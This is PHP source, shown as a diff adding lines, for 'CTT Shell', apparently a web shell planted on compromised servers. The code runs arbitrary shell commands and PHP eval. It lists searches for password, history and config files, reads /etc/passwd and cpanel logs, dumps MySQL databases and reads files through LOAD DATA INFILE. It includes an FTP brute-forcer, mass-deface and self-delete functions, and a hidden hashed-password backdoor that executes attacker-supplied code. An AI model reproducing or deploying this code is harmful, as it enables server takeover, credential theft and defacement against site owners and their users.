+$aliases[] = array("-----------------------------------------------------------", "ls -la"); +$aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls"); +$aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls"); +$aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls"); +$aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls"); +$aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php"); +$aliases[] = array("find config* files", "find / -type f -name \"config*\""); + $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\""); +$aliases[] = array("find all writable directories and files", "find / -perm -2 -ls"); +$aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls"); +$aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd"); +$aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd"); +$aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd"); +$aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"); +$aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history"); +$aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history"); +$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"); +$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"); +$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va"); +$aliases[] = array("show opened ports", "netstat -an | grep -i listen"); +$sess_method = "cookie"; +$sess_cookie = "ctshvars"; +if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));} +$sess_file = $tmpdir."ctshvars_".$sid.".tmp"; +$usefsbuff = true; +$copy_unset = false; +$quicklaunch = array(); +$quicklaunch[] = array("",$sul); +$quicklaunch[] = array("","#\" onclick=\"history.back(1)"); +$quicklaunch[] = array("","#\" onclick=\"history.go(1)"); +$quicklaunch[] = array("",$sul."act=ls&d=%upd"); +$quicklaunch[] = array("",""); +$quicklaunch[] = array("",$sul."act=fsbuff&d=%d"); +$quicklaunch1 = array(); +$quicklaunch1[] = array("Ïðîöåññû",$sul."act=ps_aux&d=%d"); +$quicklaunch1[] = array("Ïàðîëè",$sul."act=lsa&d=%d"); +$quicklaunch1[] = array("Êîìàíäû",$sul."act=cmd&d=%d"); +$quicklaunch1[] = array("Çàãðóçêà",$sul."act=upload&d=%d"); +$quicklaunch1[] = array("Áàçà",$sul."act=sql&d=%d"); +$quicklaunch1[] = array("PHP-Êîä",$sul."act=eval&d=%d"); +$quicklaunch1[] = array("PHP-Èíôî",$sul."act=phpinfo\" target=\"blank=\"_target"); +$quicklaunch1[] = array("Ñàì óäàëÿþò",$sul."act=selfremove"); +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +@$f = $_GET[f]; +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +@ignore_user_abort(true); +@set_magic_quotes_runtime(0); +@set_time_limit(0); +if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);} +if(!ini_get("register_globals")) {import_request_variables("GPC");} +$starttime = getmicrotime(); +if (get_magic_quotes_gpc()) +{ +if (!function_exists("strips")) +{ + function strips(&$el) + { + if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} } + else {$el = stripslashes($el);} + } +} +strips($GLOBALS); +} +$tmp = array(); +foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; + + +if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);} +elseif(empty($md5_pass)) {$md5_pass = md5($pass);} +if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass)) +{ + header("WWW-Authenticate: Basic realm=\"CTT SHELL\""); + header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);} + exit; +} + +$lastdir = realpath("."); +chdir($curdir); + +if (($selfwrite) or ($updatenow)) +{ + if ($selfwrite == "1") {$selfwrite = "ctshell.php";} + ctsh_getupdate(); + $data = file_get_contents($ctsh_updatefurl); + $fp = fopen($data,"w"); + fwrite($fp,$data); + fclose($fp); + exit; +} +if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);} +if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));} +else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);} +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} +$sess_data["copy"] = array_unique($sess_data["copy"]); +$sess_data["cut"] = array_unique($sess_data["cut"]); + +if (!function_exists("ct_sess_put")) +{ +function ct_sess_put($data) +{ + global $sess_method; + global $sess_cookie; + global $sess_file; + global $sess_data; + $sess_data = $data; + $data = serialize($data); + if ($sess_method == "file") + { + $fp = fopen($sess_file,"w"); + fwrite($fp,$data); + fclose($fp); + } + else {setcookie($sess_cookie,$data);} +} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0, $len)."...".substr($content, -$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\","/",$d); + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} +else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);} +if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (!is_dir($t)) {mkdir($t);} + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) + { + + return copy($d,$t); + } + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + error_reporting(9999); + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +$ret = true; +if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);} +else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}} +if (!$ret) {return $ret;} + } + } + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\","/",$d); + $t = str_replace("\\","/",$t); + if (is_dir($d)) + { + if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";} + if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) {return rename($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while ($o = readdir($h)) + { + if (($o != ".") and ($o != "..")) + { +if (!is_dir($d.$o)) {unlink($d.$o);} +else {fs_rmdir($d.$o."/"); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\","/",$o); + if (is_dir($o)) + { + if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ + function myshellexec($cmd) + { + return system($cmd); + } +} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner['read'] = ($mode & 00400) ? "r" : "-"; + $owner['write'] = ($mode & 00200) ? "w" : "-"; + $owner['execute'] = ($mode & 00100) ? "x" : "-"; + $group['read'] = ($mode & 00040) ? "r" : "-"; + $group['write'] = ($mode & 00020) ? "w" : "-"; + $group['execute'] = ($mode & 00010) ? "x" : "-"; + $world['read'] = ($mode & 00004) ? "r" : "-"; + $world['write'] = ($mode & 00002) ? "w" : "-"; + $world['execute'] = ($mode & 00001) ? "x" : "-"; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";} + if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";} + if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";} + + return $type.$owner['read'].$owner['write'].$owner['execute']. + $group['read'].$group['write'].$group['execute']. + $world['read'].$world['write'].$world['execute']; +} +} +if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}} +if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}} +if (!function_exists("ctsh_getupdate")) +{ +function ctsh_getupdate() +{ + global $updatenow; + $data = @file_get_contents($ctsh_updatefurl); + if (!$data) {echo "Can't fetch update-information!";} + else + { + $data = unserialize(base64_decode($data)); + if (!is_array($data)) {echo "Corrupted update-information!";} + else + { +if ($cv < $data[cur]) {$updatenow = true;} + } + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = true;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + global $win; + if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";} + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + global $SERVER_ADDR; + global $SERVER_NAME; + $out = "# Dumped by ctShell.SQL v. ".$cv." +# Home page: http://.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"." +# Date: ".date("d.m.Y H:i:s")." +# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { +if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} +$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); +if (!$res) {$ret[err][] = mysql_error();} +else +{ + $row = mysql_fetch_row($res); + $out .= $row[1].";\n\n"; + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { +$keys = implode("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = addslashes($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; +$out .= $sql; + } + } +} + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret[err][] = 2;} + else + { +fwrite ($fp, $out); +fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $ret; +} +} +if (!function_exists("ctfsearch")) +{ +function ctfsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $a; + if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} + $handle = opendir($d); + while ($f = readdir($handle)) + { + $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f)); + if($f != "." && $f != "..") + { +if (is_dir($d.$f)) +{ + if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;} + ctfsearch($d.$f); +} +else +{ + if ($true) + { + if (!empty($a[text])) + { +$r = @file_get_contents($d.$f); +if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";} +if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);} + +if ($a[text_regexp]) {$true = ereg($a[text],$r);} +else {$true = strinstr($a[text],$r);} +if ($a[text_not]) +{ + if ($true) {$true = false;} + else {$true = true;} +} +if ($true) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } +} + } + } + closedir($handle); +} +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); + +global $SERVER_SOFTWARE; +if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;} +else {$win = 0;} + +if (empty($tmpdir)) +{ + if (!$win) {$tmpdir = "/tmp/";} + else {$tmpdir = $_ENV[SystemRoot];} +} +$tmpdir = str_replace("\\","/",$tmpdir); +if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "ON (secure)"; +} +else {$safemode = false; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") +{ + $openbasedir = true; + $hopenbasedir = "".$v.""; +} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} + +$sort = htmlspecialchars($sort); + +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"
    PHP/".phpversion()."",$SERVER_SOFTWARE); + +@ini_set("highlight.bg",$highlight_bg); +@ini_set("highlight.comment",$highlight_comment); +@ini_set("highlight.default",$highlight_default); +@ini_set("highlight.html",$highlight_html); +@ini_set("highlight.keyword",$highlight_keyword); +@ini_set("highlight.string","#DD0000"); + +if ($act != "img") +{ +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> + + + + +CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- + + + + +
    +
    + + + + +
    + + + + + + +
    + +".htmlspecialchars($b)."/"; + $i++; +} +?> +
    + +
    +Èíñòðóìåíòû - + +Èíôîðìàòîð + + + - Äèñêè + + + +About +
    + +
    +
    + 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]); + echo "".$item[0]."    "; + } +} +?> +
    +
    + +

    + +
    "; + if (!$sql_sock) {?> +
    Ìåíåäæåð SQL:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");} + else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");} + $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$sul."act=sql"); + + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "

    +
  • Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïðîöåññà.
  • +
  • Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost
  • +
  • Åñëè ïîðò ÿâëÿåòñÿ ïóñòûì, ïîðò - 3306 (íåïëàòåæ)
  • + +
     Çàïîëíèòå ôîðìó: + + + + +
    Èìÿ:Ïàðîëü:
    +
    Õîñò:Ïîðò:
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    +"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} +} + } + else + { +?>
    Home

    Ïîæàëóéñòà, âûáåðèòå áàçó äàííûõ
    "; + if ($sql_db) + { +echo "
    There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
    "; +if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} +echo "
    "; + +$acts = array("","dump"); + +if ($sql_act == "query") +{ + echo "
    "; + if ($submit) + { + if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "



     
    ";} +} +if (in_array($sql_act,$acts)) +{ + ?>
    Create new table:
     
    SQL-Dump DB:
    "> 
    ";} + if ($sql_act == "newtpl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();} +} +elseif ($sql_act == "dump") +{ + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "print"; + if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} + elseif ($dump_out == "download") + { + @ob_clean(); + header("Content-type: ctshell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + $set["print"] = 1; + $set["nl2br"] = 1; + } + $set["file"] = $dump_file; + $set["add_drop"] = true; + $ret = mysql_dump($set); + if ($dump_out == "download") {exit;} +} +else +{ + $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); + echo "
    "; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) + { + $tsize += $row["5"]; + $trows += $row["5"]; + $size = view_size($row["5"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row[0]." ".$row[3]."".$row[1]."".$row[10]."".$row[11]."".$size." +  +
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     
    "; + mysql_free_result($result); +} + } + } + else + { +$acts = array("","newdb","serverstat","servervars","processes","getfile"); +if (in_array($sql_act,$acts)) +{ + ?>
    Ñîçäàéòå íîâûé Áàçó:
     
    Ïðèñìîòðåòü Ôàéëà:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_error();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    Namevalue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Ïðîöåññû:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + elseif (($sql_act == "getfile")) + { + if (!mysql_create_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} + else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} + else + { +for ($i=0;$i$col_value) {$f .= $col_value;}} +if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";} +else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f));} + } + mysql_free_result($result); + if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} + } + } +} + } + } + echo "
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}} + echo "

    "; + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if ($win) {echo "This functions not work in Windows!

    ";} + else + { + function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { +if ($fqb_onlywithsh) +{ + if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;} + else {$true = true;} +} +else {$true = true;} +if ($true) +{ + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return true; + } +} + } + if (!empty($submit)) + { +if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} +$fp = fopen("/etc/passwd","r"); +if (!$fp) {echo "Can't get /etc/passwd for password-list.";} +else +{ + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { +$success++; + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."

    Connects per second: ".round($i/$ftpquick_t,2)."
    "; +} + } + else {echo "

    Read first:

    Users only with shell? 

    ";} + } +} +if ($act == "lsa") +{ + echo "
    Èíôîðìàöèÿ áåçîïàñíîñòè ñåðâåðà:
    "; + echo "Ïðîãðàììíîå îáåñïå÷åíèå: ".PHP_OS.", ".$SERVER_SOFTWARE."
    "; + echo "Áåçîïàñíîñòü: ".$hsafemode."
    "; + echo "Îòêðûòûé îñíîâíîé äèðåêòîð: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { +if ($nixpasswd == 1) {$nixpasswd = 0;} +$num = $nixpasswd + $nixpwdperpage; +echo "*nix /etc/passwd:
    "; +$i = $nixpasswd; +while ($i < $num) +{ + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."
    ";} + $i++; +} + } + else {echo "
    Get /etc/passwd
    ";} + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "Âû ìîæåòå âçëîìàòü winnt ïàðîëè. Ñêà÷àòü, c èñïîëüçîâàíèå lcp.crack+.
    ";} + } +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else + { + echo "File-System buffer

    "; + $ls_arr = $arr; + $disp_fullpath = true; + $act = "ls"; + } +} +if ($act == "selfremove") +{ + if (!empty($submit)) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + $v = array(); + for($i=0;$i<8;$i++) {$v[] = "NO";} + $v[] = "YES"; + shuffle($v); + $v = join("   ",$v); + echo "Ñàìîóäàëèòü: ".__FILE__."
    Âû óâåðåííû?
    ".$v."
    "; + } +} +if ($act == "massdeface") +{ + if (empty($deface_in)) {$deface_in = $d;} + if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} + if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + + $text = $deface_text; + $text_regexp = $deface_text_regexp; + if (empty($text)) {$text = " "; $text_regexp = 1;} + + $a = array + ( +"name"=>$deface_name, "name_regexp"=>$deface_name_regexp, +"text"=>$text, "text_regexp"=>$text_regxp, +"text_wwo"=>$deface_text_wwo, +"text_cs"=>$deface_text_cs, +"text_not"=>$deface_text_not + ); + $defacetime = getmicrotime(); + $in = array_unique(explode(";",$deface_in)); + foreach($in as $v) {ctfsearch($v);} + $defacetime = round(getmicrotime()-$defacetime,4); + if (count($found) == 0) {echo "No files found!";} + else + { +$ls_arr = $found; +$disp_fullpath = true; +$act = $dspact = "ls"; + } + } + else + { + if (empty($deface_preview)) {$deface_preview = 1;} + + } + echo "
